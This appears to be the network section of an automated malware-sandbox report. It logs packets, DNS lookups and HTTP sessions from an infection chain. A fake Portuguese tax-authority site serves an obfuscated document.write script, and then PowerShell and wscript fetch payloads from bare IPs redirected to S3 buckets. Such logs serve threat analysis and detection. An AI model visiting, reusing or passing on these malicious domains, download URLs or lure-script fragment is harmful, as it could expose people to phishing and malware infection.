Mar 24, 2025 17:33:25.218190908 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:25.218214989 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:25.218235016 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:25.269931078 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:25.310899019 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:25.336090088 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:25.336098909 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:25.336134911 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:25.336144924 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:25.336162090 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:25.336163998 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:25.336178064 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:25.336189985 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:25.336204052 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:25.389012098 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:25.414026976 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:25.414036989 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:25.414072990 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:25.414091110 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:25.414098978 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:25.414114952 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:25.414135933 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:25.467129946 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:25.530268908 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:25.530282021 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:25.530311108 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:25.530324936 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:25.530328989 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:25.530338049 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:25.530359030 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:25.530371904 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:25.530371904 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:25.530422926 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:25.571861982 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:25.571872950 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:25.571899891 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:25.571917057 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:25.571932077 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:25.571939945 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:25.571950912 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:25.571983099 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:25.685700893 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:25.685723066 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:25.685755968 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:25.685781956 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:25.685789108 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:25.685935974 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:25.732848883 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:25.762900114 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:25.762909889 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:25.763061047 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:25.763093948 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:25.763094902 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:25.763104916 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:25.763115883 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:25.763117075 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:25.763196945 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:25.806091070 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:25.806109905 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:25.806184053 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:25.806184053 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:25.806195974 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:25.857759953 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:25.924371958 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:25.924381971 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:25.924439907 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:25.924453020 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:25.924477100 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:25.924484968 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:25.924511909 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:25.967658043 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:26.000148058 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:26.000157118 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:26.000242949 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:26.000256062 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:26.000274897 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:26.000282049 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:26.000327110 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:26.000327110 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:26.044684887 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:26.044719934 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:26.044729948 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:26.044758081 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:26.044768095 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:26.044776917 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:26.044800997 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:26.044861078 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:26.159121990 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:26.159133911 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:26.159202099 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:26.159209967 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:26.159219980 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:26.159334898 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:26.234062910 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:26.234074116 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:26.234143972 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:26.234175920 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:26.234371901 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:26.234381914 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:26.279640913 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:26.280081987 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:26.280092001 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:26.280292988 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:26.280303001 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:26.280322075 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:26.280333996 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:26.280363083 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:26.280611992 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:26.281383038 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:26.327667952 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:26.351898909 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:26.351933002 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:26.352027893 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:26.352027893 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:26.352034092 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:26.352046013 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:26.352082014 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:26.352108955 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:26.352332115 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:26.393060923 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:26.401437998 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:26.401487112 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:26.401531935 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:26.401557922 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:26.401595116 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:26.451527119 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:26.451539040 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:26.498390913 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:26.510889053 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:26.510921955 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:26.511027098 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:26.511027098 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:26.511049986 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:26.511065960 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:26.511096001 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:26.511131048 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:26.513058901 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:26.513065100 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:26.562136889 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:26.583133936 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:26.583148003 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:26.583205938 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:26.583218098 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:26.583239079 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:26.583282948 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:26.583288908 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:26.631278992 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:26.631443024 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:26.631462097 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:26.631484032 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:26.631649017 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:26.631659985 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:26.631680965 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:26.632086992 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:26.636468887 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:26.637401104 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:26.703573942 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:26.703619003 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:26.703671932 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:26.703721046 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:26.916366100 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:26.916454077 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:27.368413925 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:27.368693113 CET	49730	443	192.168.2.8	3.5.129.15
Mar 24, 2025 17:33:28.232362986 CET	443	49730	3.5.129.15	192.168.2.8
Mar 24, 2025 17:33:28.232423067 CET	49730	443	192.168.2.8	3.5.129.15

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 24, 2025 17:30:07.940525055 CET	53	51120	1.1.1.1	192.168.2.8
Mar 24, 2025 17:30:07.975058079 CET	53	56203	1.1.1.1	192.168.2.8
Mar 24, 2025 17:30:08.879215002 CET	53	50142	1.1.1.1	192.168.2.8
Mar 24, 2025 17:30:12.250353098 CET	50188	53	192.168.2.8	1.1.1.1
Mar 24, 2025 17:30:12.250600100 CET	60484	53	192.168.2.8	1.1.1.1
Mar 24, 2025 17:30:12.358949900 CET	53	50188	1.1.1.1	192.168.2.8
Mar 24, 2025 17:30:12.359046936 CET	53	60484	1.1.1.1	192.168.2.8
Mar 24, 2025 17:30:13.697849035 CET	56107	53	192.168.2.8	1.1.1.1
Mar 24, 2025 17:30:13.698308945 CET	55561	53	192.168.2.8	1.1.1.1
Mar 24, 2025 17:30:13.940557003 CET	53	56107	1.1.1.1	192.168.2.8
Mar 24, 2025 17:30:13.951981068 CET	53	55561	1.1.1.1	192.168.2.8
Mar 24, 2025 17:30:25.887166977 CET	53	61527	1.1.1.1	192.168.2.8
Mar 24, 2025 17:30:28.013871908 CET	53	49944	1.1.1.1	192.168.2.8
Mar 24, 2025 17:30:28.534635067 CET	53	59155	1.1.1.1	192.168.2.8
Mar 24, 2025 17:30:40.479358912 CET	59394	53	192.168.2.8	1.1.1.1
Mar 24, 2025 17:30:40.618211985 CET	53	59394	1.1.1.1	192.168.2.8
Mar 24, 2025 17:30:44.701044083 CET	53	58157	1.1.1.1	192.168.2.8
Mar 24, 2025 17:31:07.020832062 CET	53	57704	1.1.1.1	192.168.2.8
Mar 24, 2025 17:31:07.579041958 CET	53	51144	1.1.1.1	192.168.2.8
Mar 24, 2025 17:31:10.804245949 CET	53	57799	1.1.1.1	192.168.2.8
Mar 24, 2025 17:31:37.500974894 CET	53	58225	1.1.1.1	192.168.2.8
Mar 24, 2025 17:31:47.602797031 CET	138	138	192.168.2.8	192.168.2.255
Mar 24, 2025 17:32:22.187756062 CET	53	57573	1.1.1.1	192.168.2.8
Mar 24, 2025 17:33:08.902719975 CET	50864	53	192.168.2.8	1.1.1.1
Mar 24, 2025 17:33:09.040700912 CET	53	50864	1.1.1.1	192.168.2.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Mar 24, 2025 17:30:12.250353098 CET	192.168.2.8	1.1.1.1	0xd8c9	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Mar 24, 2025 17:30:12.250600100 CET	192.168.2.8	1.1.1.1	0xcd4e	Standard query (0)	www.google.com	65	IN (0x0001)	false
Mar 24, 2025 17:30:13.697849035 CET	192.168.2.8	1.1.1.1	0xd298	Standard query (0)	autoridade-tributaria.com	A (IP address)	IN (0x0001)	false
Mar 24, 2025 17:30:13.698308945 CET	192.168.2.8	1.1.1.1	0xe356	Standard query (0)	autoridade-tributaria.com	65	IN (0x0001)	false
Mar 24, 2025 17:30:40.479358912 CET	192.168.2.8	1.1.1.1	0xd4fc	Standard query (0)	ld-1803-p.s3.us-east-2.amazonaws.com	A (IP address)	IN (0x0001)	false
Mar 24, 2025 17:33:08.902719975 CET	192.168.2.8	1.1.1.1	0x9dfa	Standard query (0)	ld-2403-p.s3.us-east-2.amazonaws.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Mar 24, 2025 17:30:12.358949900 CET	1.1.1.1	192.168.2.8	0xd8c9	No error (0)	www.google.com		142.251.41.4	A (IP address)	IN (0x0001)	false
Mar 24, 2025 17:30:12.359046936 CET	1.1.1.1	192.168.2.8	0xcd4e	No error (0)	www.google.com			65	IN (0x0001)	false
Mar 24, 2025 17:30:13.940557003 CET	1.1.1.1	192.168.2.8	0xd298	No error (0)	autoridade-tributaria.com		162.241.60.162	A (IP address)	IN (0x0001)	false
Mar 24, 2025 17:30:40.618211985 CET	1.1.1.1	192.168.2.8	0xd4fc	No error (0)	ld-1803-p.s3.us-east-2.amazonaws.com	s3-r-w.us-east-2.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 24, 2025 17:30:40.618211985 CET	1.1.1.1	192.168.2.8	0xd4fc	No error (0)	s3-r-w.us-east-2.amazonaws.com		52.219.108.138	A (IP address)	IN (0x0001)	false
Mar 24, 2025 17:30:40.618211985 CET	1.1.1.1	192.168.2.8	0xd4fc	No error (0)	s3-r-w.us-east-2.amazonaws.com		52.219.177.42	A (IP address)	IN (0x0001)	false
Mar 24, 2025 17:30:40.618211985 CET	1.1.1.1	192.168.2.8	0xd4fc	No error (0)	s3-r-w.us-east-2.amazonaws.com		52.219.110.170	A (IP address)	IN (0x0001)	false
Mar 24, 2025 17:30:40.618211985 CET	1.1.1.1	192.168.2.8	0xd4fc	No error (0)	s3-r-w.us-east-2.amazonaws.com		52.219.229.170	A (IP address)	IN (0x0001)	false
Mar 24, 2025 17:30:40.618211985 CET	1.1.1.1	192.168.2.8	0xd4fc	No error (0)	s3-r-w.us-east-2.amazonaws.com		16.12.64.82	A (IP address)	IN (0x0001)	false
Mar 24, 2025 17:30:40.618211985 CET	1.1.1.1	192.168.2.8	0xd4fc	No error (0)	s3-r-w.us-east-2.amazonaws.com		52.219.107.10	A (IP address)	IN (0x0001)	false
Mar 24, 2025 17:30:40.618211985 CET	1.1.1.1	192.168.2.8	0xd4fc	No error (0)	s3-r-w.us-east-2.amazonaws.com		52.219.177.194	A (IP address)	IN (0x0001)	false
Mar 24, 2025 17:30:40.618211985 CET	1.1.1.1	192.168.2.8	0xd4fc	No error (0)	s3-r-w.us-east-2.amazonaws.com		52.219.233.130	A (IP address)	IN (0x0001)	false
Mar 24, 2025 17:33:09.040700912 CET	1.1.1.1	192.168.2.8	0x9dfa	No error (0)	ld-2403-p.s3.us-east-2.amazonaws.com	s3-r-w.us-east-2.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 24, 2025 17:33:09.040700912 CET	1.1.1.1	192.168.2.8	0x9dfa	No error (0)	s3-r-w.us-east-2.amazonaws.com		3.5.129.15	A (IP address)	IN (0x0001)	false
Mar 24, 2025 17:33:09.040700912 CET	1.1.1.1	192.168.2.8	0x9dfa	No error (0)	s3-r-w.us-east-2.amazonaws.com		3.5.131.13	A (IP address)	IN (0x0001)	false
Mar 24, 2025 17:33:09.040700912 CET	1.1.1.1	192.168.2.8	0x9dfa	No error (0)	s3-r-w.us-east-2.amazonaws.com		52.219.179.42	A (IP address)	IN (0x0001)	false
Mar 24, 2025 17:33:09.040700912 CET	1.1.1.1	192.168.2.8	0x9dfa	No error (0)	s3-r-w.us-east-2.amazonaws.com		3.5.128.123	A (IP address)	IN (0x0001)	false
Mar 24, 2025 17:33:09.040700912 CET	1.1.1.1	192.168.2.8	0x9dfa	No error (0)	s3-r-w.us-east-2.amazonaws.com		3.5.132.217	A (IP address)	IN (0x0001)	false
Mar 24, 2025 17:33:09.040700912 CET	1.1.1.1	192.168.2.8	0x9dfa	No error (0)	s3-r-w.us-east-2.amazonaws.com		3.5.130.219	A (IP address)	IN (0x0001)	false
Mar 24, 2025 17:33:09.040700912 CET	1.1.1.1	192.168.2.8	0x9dfa	No error (0)	s3-r-w.us-east-2.amazonaws.com		52.219.229.146	A (IP address)	IN (0x0001)	false
Mar 24, 2025 17:33:09.040700912 CET	1.1.1.1	192.168.2.8	0x9dfa	No error (0)	s3-r-w.us-east-2.amazonaws.com		3.5.133.16	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

autoridade-tributaria.com

ld-1803-p.s3.us-east-2.amazonaws.com

ld-2403-p.s3.us-east-2.amazonaws.com

3.133.160.140

3.128.172.139

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49713	3.133.160.140	80	6560	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
Mar 24, 2025 17:30:39.727372885 CET	165	OUT	GET /349.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: 3.133.160.140 Connection: Keep-Alive
Mar 24, 2025 17:30:40.468264103 CET	270	IN	HTTP/1.1 302 Found Date: Mon, 24 Mar 2025 16:30:39 GMT Server: Apache/2.4.58 (Ubuntu) Location: https://ld-1803-p.s3.us-east-2.amazonaws.com/moIMNba Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	49729	3.128.172.139	80	5744	C:\Windows\System32\wscript.exe

Timestamp	Bytes transferred	Direction	Data
Mar 24, 2025 17:33:08.171150923 CET	154	OUT	GET /498.php HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: 3.128.172.139
Mar 24, 2025 17:33:08.896663904 CET	270	IN	HTTP/1.1 302 Found Date: Mon, 24 Mar 2025 16:33:08 GMT Server: Apache/2.4.58 (Ubuntu) Location: https://ld-2403-p.s3.us-east-2.amazonaws.com/gEkBKUi Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49694	162.241.60.162	443	4232	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 16:30:14 UTC	2575	OUT	GET /MAR-FAT/Comprovativo_Marco_uGGehnlzuhp_17-03-2025_207.php?=5QIANUHVWY9RY9RLV9EDEU0O1K960ZX2O3J7881Z6MUA19M6BQML1HJNK4IWVL3BEGD5YUMZITH2A0Z2NC5MLLAFV7IDYDCZTS5V5RGSDYCJASM8IRMTQT13G7M2LH6FRXLT4B765OHXI0FCXJ5J1UG90CP7EPG5273QH2EHTQZBLFXQ1IHBNZO6PL22W92SGN2L7052FK1N7EKVR8F5HFUGU7A6ANUUWF58OLSBOP6K5B8JXHMK36LB3Z0A0912EHY1J0HFSET2J4MT81M3A50053F0USMPWDUWMH949FHKPS18LIB8W81JS86RXRZ93EFFMWG11R35KBMOCGRMRN0KNLGOMUJTUH5LNZZWBLHHE6XRZTPPALUSOR3BS3QIHMMRFBAQU3LFEUVQKY02F4SIKP662XFH4893VFLXS84HAON46ON1DWDN3D11EEW7WCMGU05UQEMH9LILCCAPJPDH5ZASOUSOL6U7CGLFT2N9N5OT4RKCDIKJ9DL60OG5W76C0LI6145SBE5AJSZ64QJBIL886PQFXSMP9L2UI2LIOGH4ILZI0JAIW43QNJ9OQ05V2RA9YDKCEAKBCD0X1GPNRD0FRNH9273ZMZB2JWTWX8DZF1OIUOXIMUEYY5TO5YJGHB0RC7NDK01T9D9K98QPNVM2TNCPFE16Y6QEB6GXBSVX1ZYX63P7J44W087Y488U853DK4WC14O4AYA6WRSN04Z4C1OD9S0DUAZ63Z7BFNGQSAWA7BCPRX3EI8A7SVCLDLL9DDDBURGOKHOBEOF8PNZ8HTK4X9VXJ5MH0K747B4AQQRAV93EPE50WN1XQIQU6XE25GMRQMAOTZT2BWJZGRGE9XUO6NPKXLE4LKFPWNKDDTIB39U193OQP92LZ7UD6N1ITKSOT5831DBSOTV62ZY17KQM54103XG10AUESGJD5UKM8L6EOWLJZ9L3 [TRUNCATED] Host: autoridade-tributaria.com Connection: keep-alive sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-24 16:30:15 UTC	208	IN	HTTP/1.1 200 OK Date: Mon, 24 Mar 2025 16:30:14 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2025-03-24 16:30:15 UTC	7984	IN	Data Raw: 34 30 30 30 0d 0a ef bb bf ef bb bf 3c 73 63 72 69 70 74 3e 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 75 6e 65 73 63 61 70 65 28 27 25 33 43 25 32 31 44 4f 43 54 59 50 45 25 32 30 68 74 6d 6c 25 33 45 25 30 44 25 30 41 25 33 43 64 65 74 61 69 6c 73 25 32 30 68 69 64 64 65 6e 25 33 45 76 63 71 76 61 76 75 6f 76 67 61 75 69 65 6f 76 71 68 75 65 71 78 79 63 62 6b 73 6a 68 64 64 75 73 7a 69 69 6f 68 6d 70 66 75 76 62 6c 6d 70 76 76 71 64 78 77 7a 64 61 72 71 74 64 68 72 79 69 6c 76 73 69 7a 6c 73 75 6f 6b 6e 75 71 75 66 63 78 68 62 61 6f 7a 61 72 77 70 6f 62 6c 72 6d 6a 66 79 71 64 6d 6a 76 76 65 79 79 78 63 73 76 75 66 73 6d 78 61 63 61 74 7a 66 65 64 64 79 6a 67 6c 75 63 68 6f 68 6b 6b 6e 6c 67 6c 6b 63 64 66 67 6c 70 67 76 74 78 64 72 73 75 6e 7a Data Ascii: 4000<script>document.write(unescape('%3C%21DOCTYPE%20html%3E%0D%0A%3Cdetails%20hidden%3Evcqvavuovgauieovqhueqxycbksjhddusziiohmpfuvblmpvvqdxwzdarqtdhryilvsizlsuoknuqufcxhbaozarwpoblrmjfyqdmjvveyyxcsvufsmxacatzfeddyjgluchohkknlglkcdfglpgvtxdrsunz
2025-03-24 16:30:15 UTC	8406	IN	Data Raw: 69 79 71 65 78 72 7a 64 76 62 6f 70 76 66 77 74 63 68 78 67 76 72 69 6b 66 68 71 6d 68 79 67 68 79 72 73 69 77 6d 66 71 74 6e 73 61 6a 61 70 61 73 73 7a 69 6e 76 6c 76 6a 6f 6e 64 66 67 6c 74 75 7a 78 74 65 7a 74 63 6b 65 64 6b 62 73 63 6a 61 78 75 73 67 6d 6e 71 73 7a 76 62 61 61 6f 7a 74 74 6b 61 66 69 79 78 72 6d 64 78 6a 62 73 75 79 74 72 63 6e 78 7a 6a 66 62 79 6e 68 64 62 64 7a 61 76 62 72 79 69 73 73 62 68 61 62 79 61 6d 75 6f 68 6f 64 70 6d 75 65 70 70 64 77 70 73 6d 75 66 77 79 6b 6b 72 6c 62 76 6d 69 61 70 79 78 7a 74 6e 66 62 69 78 77 67 72 75 71 76 75 6c 72 77 77 6f 62 70 71 61 67 68 7a 73 75 6f 6c 6f 75 6a 63 6e 72 71 62 6d 79 65 6d 72 64 6e 66 6e 6c 61 77 65 7a 72 74 72 6d 6b 78 69 71 63 65 66 62 77 6f 71 70 6a 64 71 6e 61 72 72 78 6f 74 